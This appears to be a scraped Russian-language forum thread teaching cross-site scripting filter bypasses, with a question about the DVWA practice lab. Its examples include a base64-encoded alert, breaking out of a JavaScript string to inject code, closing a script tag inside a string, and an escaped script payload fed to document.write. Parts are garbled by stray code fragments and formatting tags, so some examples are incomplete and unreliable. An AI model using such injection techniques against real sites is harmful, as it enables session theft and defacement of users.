Примеры:
1)
Символы
(,
),
= никто фильтровать не будет. Закрывать тег необязательно. Если проходит [B]
[B]
[/QUOTE]
" if author else f"
YWxlcnQoJ1hTUycp - alert('XSS') в base64.
2)
Даже если кавычка экранируется
2.1)
В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов.
В myfunction() содержимое value передается как alert("test").
3)
Сообщение от
None
a = 'XSS';
b = 'blablabla';
c = myfunction(a, b);
Закрываем строку, вставляем свой код.
Сообщение от
None
a = '
';alert('test');b='
';
b = 'blablabla';
c = myfunction(a, b);
Тег script можно закрыть даже внутри строки.
Сообщение от
None
a = '
[B]
3.1)
Сообщение от
None
text = 'XSS';
document.write('' + text + '');
Сообщение от
None
text = '
\x3Cscript\x3Ealert\x28\x27test\u0027\u0029\u003C\ u002Fscript\u003E
';
document.write('' + text + '');
Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего.
Сообщение от
NZT
И это же получается не одно сообщение или подругому никак?
Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице.
Сообщение от
NZT
возможна ли в DVWA, xss на уровне high а то у меня ничего не получается )
Ни разу не пробовал проходить DVWA